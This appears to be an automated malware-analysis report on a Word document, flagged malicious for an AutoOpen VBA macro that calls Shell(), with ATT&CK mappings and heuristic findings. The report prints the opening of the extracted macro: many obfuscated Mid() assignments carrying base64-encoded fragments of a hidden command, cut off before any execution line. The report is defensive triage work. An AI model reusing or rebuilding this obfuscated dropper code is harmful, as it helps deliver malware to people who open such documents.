MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function to execute a command. This command appears to be constructing a registry path for persistence and likely downloading a second-stage payload. The obfuscated nature of the script and the use of Shell() indicate a malicious intent to execute arbitrary code.
Heuristics 7
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13124 bytes |
SHA-256: 416f7d651c5f1b2981166b95b9710b22a8d1229923f2fe5ae6f3b87906ef369a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 31 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "osjTPnoCq"
Function roRdIbifB()
DzUHXosjZrf = Mid("0R8zi891u6nI9o6vJCfgA1ADcAYQAxADYANwBxADEANgA3AG4AMQA2ADcAcAA1ADYAOgAxADUAMgBuADEANAAxAFoAMQA2ADcAXwAxADQAMQBaADEANQA0AF8AMQA2ADUAbgAxADUANQA6ADEMESazArM4lzvj", 19, 127)
zMaRT = Mid("mO1TUNCNMcOiBPNQ7zpzDHoJn6BA6ADEANgA0ADoAMQA2ADQAOgAxADYAMABaADcAMgB5ADUANwBUADUANwBaADEANAAxAHoDldi4ChUUi", 28, 68)
mZXTDHYrB = Mid("shXjANQBhADEANAAyAH4AMQAwADMAcQAxADUANABaADEANQAxAHAAMQA0ADUAcQAxADUANgBUADEANgA0AHEANwAzAHkANAA0AFQAMQA2ADIAXwAxADQAMQB5ADEANQA2AHkAMQA0ADQAcAAxADUANwBfADEANQA1AFoANAAwAHAANwA1AHAANAAwAG4AMQA1ADYAfgAxA7Y4r31wjdjiYiskrmTHvdJ0J7ZnSL4XuHi", 5, 198)
OjtRCGbjw = Mid("Rk9GUck3vjVf1NwAxAHAAMQA3ADIAVAA1ADcAcAA1ADQAVAAxADUAMABwADEANgA0AF8AMQA2ADQAXwAxADYAMAB5ADcAMgB+ADUANwBfADUANwA6ADEANgA3AFQAMQA2ADcAeQAxADYANwD5jNz", 14, 130)
AClItauXY = Mid("PBFfd36kAZHvwkzKBmrxADQAMwA6ADEANgA0AFQANAAwAHPIb", 20, 27)
QCkdlcwJiNw = Mid("JtChR6dQANQA0AFoANQA2ADoAMQA0ADMAXwAxADUANwBfADEANQA1AHAANQA3AH4AMQA0A31UqJfPAta", 9, 62)
zvFAOkLwJDw = Mid("3izEpUcOGVJTsHzJfuZhi1zNgA3ADoAMQA0ADUAbgAxADQAMgB+ADEANAAzAF8AMQA1ADQAfgAxADUAMQBhADEANAA1AG4AMQA1ADYAcQAxADYANABwADUANgB5ADEAMAA0ADoAMQA1ADcAbgAxADYANwBwADEANQA2AG4AMQA1ADQAcA9dCs5PMXj", 24, 154)
ioZAZJVzaac = Mid("nPTifqJwB+ACcALQBTAHAATABpAFQAIAAnAF8AJwAtAFMAcABMAEkAdAAnAHEAJwAtAFMAcABMAEkAdAAgACcAbgAnACAALQBTAHAAbABPzS4C3RvuU6j3nMo6cnzr", 7, 99)
ANsKpifBO = Mid("iMa1jXGGMQA1ADEAfgAxADUANgA6ADQAMABfADQANABfADEANgA1AHkAMQA2ADIAYQAxADUANABaADEANgAzAG4ANQAxAFQAMQA3ADMAeQAxADYANABaADEANgAyAFoAMQA3ADEAWgAxADcAMwB14", 9, 139)
uToOZMzQWtR = Mid("WwVfh3541DWgAxADUANQA6ADEANAA1AG4ANAAwAHkANwA1AHEANAAwAHkANAA0AG4AMQA2ADIAXwAxADQAMQB+ADEANQA2AF8AMQA0ADQAWgAxAvKwGI", 11, 101)
RXIGv = Mid("MV8bH31ADEAcAAxADQAMwA6ADUANgB+ADEANAA1ADoAMQA0ADMAeQAxADUANwBhADUANgB+ADEANAAyAF8AMQA2ADIAcAA1ADcAVAAxADYANwBaADEANgA0AFQANQA3AH4ANQA0AF8AMQA1ADAAeQAxADYANABxADEANgA0AGEAMQA2ADA3thkFHsJiu", 7, 172)
NwwPiY = Mid("aoJ89CBaADUANgBhADEANgAyAFoAMQA0ADUAYQAxADYAMABaADEANQA0AF8AMQA0ADEAcQAxADYAMwBaADEANgA0AHEAMQAwi6oRWtahYKr6mnr0HsRTG0aS8", 7, 89)
CWMDw = Mid("aWoaG2GUOAGEAMQA0ADEAeQAxADYANAA6ADEANQwaFM4it11QJzOz1ApvRNi", 10, 30)
IkUFUGnI = Mid("DCzPXTMQBuADEANQA2AnI5Wwnw1mFf8udn4IMjVsWIiRAaj", 7, 13)
MSLdtGSYWnh = Mid("z9AF8ANAA0ADoAMQA2ADcAcQAxADQANQB+ADEANAAyAHEAMQA0ADMAOgAxADUANABaADEANQAxADoAMQA0ADUAeQ6fR1Mn0vSb1", 3, 86)
KFLHtvdT = Mid("9vZAjl0iTjPWDMAOgAxADQAMQBhADEANgA0AHAAMQA0ADMAcAAxADUAMAA6ADEANwAzAH4AMQA2ADcAYQAxADYAMgB5ADEANQAxAHkAMQA2ADQAYQAxADQANQBwADUANQB5ADEANQAwAG4AMQA1ADcAcQAxADYAMwB5ADEBmhbqY", 13, 154)
dlVibOqdzc = Mid("P2rHtD48zYSH4AMQA0ADcAWgA1ADAAXwA1ADEAOgA1ADQAeQA0ADAAeQA0ADQAcAAxADYAMAA6ADEANAAxAFQAMQA2ADQAfgAxADUAMAA6ADUAMQBUADcAMwBwADEAMgAzAHEAMQA2ADQAcAAxADQAMQB+ADEANgAyAHkAMQA2ADQAbgA1ADUAfgAxADIAMAB5ADEANgAyAUTS", 12, 192)
zoiYGT = Mid("5GQP01tuk8miPMQA2ADQAbgA1ADYAXwAxADIAMwBaADEANQAwAFQAMQA0ADUAeQAxADUANABhADEANQA0AHAANwAz5wPV", 14, 76)
bEZnvk = Mid("55KQzvFp3waq6UhY8rm4bhVBD3DEANgA0AFoAMQA2ADAAcAA3ADIAcAA1ADcAMvr6N2u7H", 27, 35)
tbLJizU = Mid("8AXBpxADQANQBaADQAMABhADUAMwBUADQAMABuADQANwBUADUAKpdiiYduiYR", 6, 45)
wHROuErJjM = Mid("0As5WkAMQAyADMAcQAxADcAMQA6ADEANgAzAH4AMQA2ADQAWgAxADQANQBxADEANQA1AF8ANQA2AGEAMQAxADYAOgAxADQANQBuADEANgA0AFoANQA2AFQAMQAyADcAcQAxADQJCAOwdOIiPU0tLXXnrRvz8dfaacFHu", 6, 129)
ktwZZJSUWUl = Mid("2OMPWdDonlCLLfMSw3VRoYGEAMQA1ADcAeQAxADQAMwA6ADEANAA1AFQAMQA2ADMAYQAxADYAMwBuADQAMAB+ADQANABUADEANgAwpZ8kN", 23, 79)
HZNowLkwa = Mid("OGkwBMtYAizLANAAyAHkAMQA2ADUAbgAxADUANgB+ADEANAA3AF8AMQA1QY", 13, 45)
jNZJiiVTDMh = Mid("058SEANAA3AG4AMQA1ADcAWgAxADYAMwBfADEANgAzAFQANQA2AF8AMQA0ADIAOgAxADUANABfADEANQA3AFQAMQA0ADcAVAA1ADcAXwAxADAANgBaADEANgA1AFQAMQAwADcAcQAxADYANwB+ADEtDIwojBLnRhsMpbWqzDBBH", 5, 145)
mNcoRpn = Mid("bVKUATMDDrWzI1ADcAcAAxADYANwB+ADEANgA3AH4AMQA2ADcAXwA1ADYAYQAxADUAMAA6ADEANQA3AH
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.